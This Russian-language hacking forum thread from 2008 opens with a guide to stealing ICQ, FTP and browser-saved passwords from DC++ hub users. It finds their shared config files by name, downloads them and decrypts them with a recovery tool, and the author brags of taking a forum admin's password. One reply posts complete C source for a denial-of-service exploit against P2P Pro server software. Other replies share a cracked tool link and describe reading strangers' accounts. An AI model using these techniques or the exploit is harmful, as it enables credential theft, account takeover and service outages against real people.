Авторские статьи Инструмент: Dc++

Discussion in 'Статьи' started by WeddRRRyss, 26 May 2008.

  1. WeddRRRyss

    WeddRRRyss Banned

    Joined:
    15 Jan 2008
    Messages:
    29
    Likes Received:
    20
    Reputations:
    4
    Мини мануал о том, что можно вытворять на хабе.
    Все, ниже изложенное было придумано и написано мной, мб эта тема уже поднималась.
    1. Угон icq.
    Всем известно, что пассы от кипа содержаться в файле config.ini. Очень много юзверей, расшаривающих свои program files в которых зачастую находится дира qip. Далее все просто, идем поиск, вписываем config.ini, ищем. Перед тем как сливать все найденные конфиги, обязательно смотрите путь до этого файла, дабы не слить шлак. (Примерный путь до конфига: QIP/user/nomerICQ/config.ini)
    После того, как мы слили конфиг расшифровываем его прогой МПР . (Жмем «мастер», выбираем нужный модуль, ставим путь до скачанного конфига, смотрим пасс=)
    Аналогичным образом можно тырить пассы от R&Q, файл конфига - andrq.ini
    В случае с клиентами Mirana, Icq 5, Odigo, Pidgin нужно тянуть всю папку.
    2. Угон фтп.
    Все аналогично. Клиенты/файлы с конфигами.
    BulletProof FTP Client - bpftp.dat
    FileZilla - FileZilla.xml
    FTP Commander - ftplist.txt
    Total Commander - wcx_ftp.ini
    Ищем конфиги, сливаем, расшифровываем.
    3. Сохраненные в браузерах данные. (Protected Storage).
    Opera - wand.dat
    Mozilla Firefox - *.s *.txt (лучше тянуть всю папку)
    Internet Explorer – неебу (также тянем всю папку)
    Далее аналогично, сливаем, расшифровываем той же МПР.
    Есть задумка, тырить серты от Вм для входа в кипер лайт.. Но пока я не пробовал реализовать эту идею.
    4. Не палим содержимое винта.
    Часто бывает так, что для нормальной загрузки файлов с дц++ нужно расшарить нное кол-во гб, режим "за стеклом" лишь запрещает закачку другим юзерам ваших расшаренных файлов, но не просмотр названий и путей содержимого. А нам палить содержимое винта не нужно. Можно открыть любой файл хекс редактором и напихать в ручную в конец всякого говна.. Но 10гб говна это жестоко=) Для этого можно заюзать прогу Rubbish 1.0 , она добавялет указанное количество мусора в конец файла.

    Примечание.
    Всегда внимательно смотрите ники юзеров у кого сливаете конфиги, ибо нередко слабоумные админы/модеры известных или "нужных" проектов расшаривают свою конфиденциальную инфу. (у меня получалось слить конфиг от оперы одмина нашего локального форума, где у него лежал пасс от админки. Хотя до этого, его форум йа пытался похекать несколько дней)
    После прочтения статьи внимательно просмотрите ваши расшаренные файлы).
    Удачи всем!
    (c) WedRRRySS

    Интересное по теме:
    Флудер ДЦ++ http://forum.antichat.ru/thread36241.html
    Выбивание юзверей из сети http://forum.xakep.ru/m_770333/tm.htm
     
    #1 WeddRRRyss, 26 May 2008
    Last edited: 26 May 2008
    5 people like this.
  2. SMAC

    SMAC Elder - Старейшина

    Joined:
    24 Apr 2008
    Messages:
    10
    Likes Received:
    10
    Reputations:
    0
    Нах, IE хранит пароли в Protected Storage

    А так идея баян и статью эту уже кто-то писал
     
    2 people like this.
  3. WeddRRRyss

    WeddRRRyss Banned

    Joined:
    15 Jan 2008
    Messages:
    29
    Likes Received:
    20
    Reputations:
    4
    Йа лично дошел до способа сам..
     
    1 person likes this.
  4. De-visible

    De-visible [NDC] Network develope c0ders

    Joined:
    6 Jan 2008
    Messages:
    916
    Likes Received:
    550
    Reputations:
    66
    И это статья???????!!!
    М-Да удивил!
     
  5. k0lbasa

    k0lbasa Elder - Старейшина

    Joined:
    25 May 2008
    Messages:
    189
    Likes Received:
    131
    Reputations:
    -9
    в сети народу мало, подскажите какой-нибудь крупный инет хаб
     
  6. Чиловег Ниоткудо

    Joined:
    24 May 2008
    Messages:
    23
    Likes Received:
    13
    Reputations:
    4
    имхо, во многих случаях придется тянуть реестр(!)...xD
     
  7. SMAC

    SMAC Elder - Старейшина

    Joined:
    24 Apr 2008
    Messages:
    10
    Likes Received:
    10
    Reputations:
    0
    ->http://dchublist.ru/
     
  8. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    TC, я слыхал есть эксплоиты под Dc++, вот если бы ты сделал их обзор, то у статьи есть шанс выжить...
     
  9. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    382
    Likes Received:
    820
    Reputations:
    69
    Exploit EVILGMP, отрубает серв))

    PHP:
    /* 
       P2P Pro Command DOS Exploit 
    ------------------------------------ 
    Infam0us Gr0up - Securiti Research 

    Info: infamous.2hell.com 
    Vendor URL: http://www.digital-revolution.org/P2PPro.html 

    */ 

    #include <string.h> 
    #include <winsock2.h> 
    #include <stdio.h> 

    #pragma comment(lib, "ws2_32.lib") 

    char doscore[] = 
    "\x3f\x3f\xbc\x59\x70 " 
    "\x32\x70\x3f\xe1 " 
    "\x2b\x5c\x3f\xa6\xeb\xa6" 
    "\x50\x46\x2b\x5c\x3f\xa6\xeb\xa6" 
    "\x50\x4f\x57\x4e\x45\x44\x2e\x74" 
    "\x78\x74\x2b\x5c\x3f\xa6\xeb\xa6" 
    "\x50\x31\x32\x33\x32\x34\x32\x2e\x6b\x62"


    int main(int argcchar *argv[]) 

    WSADATA wsaData
    WORD wVersionRequested
    struct hostent *pTarget
    struct sockaddr_in sock
    char *target
    int port,bufsize
    SOCKET inetdos

    if (
    argc 2

    printf(" P2P Pro Command DOS Exploit \n"argv[0]); 
    printf(" --------------------------------------\n"argv[0]); 
    printf(" Infam0us Gr0up - Securiti Research\n\n"argv[0]); 
    printf("[-]Usage: %s [target] [port]\n"argv[0]); 
    printf("[?]Exam: %s localhost 7802\n"argv[0]); 
    exit(
    1); 


    wVersionRequested MAKEWORD(11); 
    if (
    WSAStartup(wVersionRequested, &wsaData) < 0) return -1

    target argv[1]; 
    port 7802

    if (
    argc >= 3port atoi(argv[2]); 
    bufsize 1024
    if (
    argc >= 4bufsize atoi(argv[3]); 

    inetdos socket(AF_INETSOCK_STREAM0); 
    if(
    inetdos==INVALID_SOCKET

    printf("Socket ERROR \n"); 
    exit(
    1); 

    printf(" P2P Pro Command DOS Exploit \n"argv[0]); 
    printf(" --------------------------------------\r\n\n"argv[0]); 
    printf("Resolve host... "); 
    if ((
    pTarget gethostbyname(target)) == NULL

    printf("FAILED \n"argv[0]); 
    exit(
    1); 

    printf("[OK]\n "); 
    memcpy(&sock.sin_addr.s_addrpTarget->h_addrpTarget->h_length); 
    sock.sin_family AF_INET
    sock.sin_port htons((USHORT)port); 

    printf("[+] Connecting... "); 
    if ( (
    connect(inetdos, (struct sockaddr *)&socksizeof (sock) ))) 

    printf("FAILED\n"); 
    exit(
    1); 

    printf("[OK]\n"); 
    printf("Target listen.. \n"); 
    printf("Sending bad procedure... "); 
    if (
    send(inetdosdoscoresizeof(doscore)-10) == -1

    printf("ERROR\n"); 
    closesocket(inetdos); 
    exit(
    1); 

    printf("[OK]\n "); 
    printf("[+] Server SHUTDOWNED!\n"); 
    closesocket(inetdos); 
    WSACleanup(); 
    return 
    0
    }
     
    #9 Solide Snake, 26 May 2008
    Last edited: 27 May 2008
    1 person likes this.
  10. WeddRRRyss

    WeddRRRyss Banned

    Joined:
    15 Jan 2008
    Messages:
    29
    Likes Received:
    20
    Reputations:
    4
    Попробую поискать..
     
    1 person likes this.
  11. t3xHuK

    t3xHuK New Member

    Joined:
    22 Aug 2007
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    статья шлак имхо....
    расшаривают папку програм файлс наверно токо блондинки и домохозяйки, которые врядли знают как это сдалать и зачем.
    и файл со шлаком на 10гиг это вообще бред...

    2 Solide Snake: tnx за сплоит)
     
    #11 t3xHuK, 26 May 2008
    Last edited: 26 May 2008
  12. life_is_shit

    life_is_shit Elder - Старейшина

    Joined:
    21 Aug 2007
    Messages:
    300
    Likes Received:
    149
    Reputations:
    19
    1) Уже было, давно сам поднимал http://forum.antichat.ru/thread49288.html
    2) Почему только DC++?
    3) маловато для статьи.

    Но все равно удачи в начинаниях=)
     
    2 people like this.
  13. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    382
    Likes Received:
    820
    Reputations:
    69
    У меня она тоже расшарена)))Только кроме папок QIP и WebMoney))
     
  14. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    317
    Likes Received:
    352
    Reputations:
    18
    Молодец,что постарался написать,но увы таких статей выходит ой как часто...
    Вот это меян безумно насмешило...хотя для совсем новичков пойдет :)
    ЗЫ:Не обижайся....я плюсиге поставил =)
     
    1 person likes this.
  15. k0lbasa

    k0lbasa Elder - Старейшина

    Joined:
    25 May 2008
    Messages:
    189
    Likes Received:
    131
    Reputations:
    -9
    ну почему же, норм статья, для начинающих сойдет, так щас пароль чей-то узнал, зашел в аську, потрепался))
     
  16. t3xHuK

    t3xHuK New Member

    Joined:
    22 Aug 2007
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    ну ладно, наверно это утверждение не актуально...
    если умно расшарить, может быть полезно разве что людям которым больше нечего шарить... + на большинстве хабов на которых я был, шарить системные папки (windos, program files, tmp, document and settigns etc.) запрещено правилами....
     
  17. *DeViL*

    *DeViL* Banned

    Joined:
    27 Nov 2007
    Messages:
    169
    Likes Received:
    56
    Reputations:
    0
    Tc, статья куль) продолжай в том же духе.;)
     
  18. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    617
    Likes Received:
    290
    Reputations:
    1
    Давным давно снимал видео по угону аськи через DС++
    вот кому интересно смотрите :)

    Ifolder
    WebFile
    pass:antichat.ru
     
  19. оlbaneс

    оlbaneс Moderator

    Joined:
    5 Nov 2007
    Messages:
    1,376
    Likes Received:
    1,094
    Reputations:
    356
    у меня в сетке этих папок расшареных куева туча оказалась))) мыло кипы и до хрена всего))

    лови +
     
    _________________________
    #19 оlbaneс, 4 Jun 2008
    Last edited: 4 Jun 2008
  20. k0lbasa

    k0lbasa Elder - Старейшина

    Joined:
    25 May 2008
    Messages:
    189
    Likes Received:
    131
    Reputations:
    -9
    http://rapidshare.com/files/120015611/MultiPasswordRecovery.exe
    вылеченная версия уже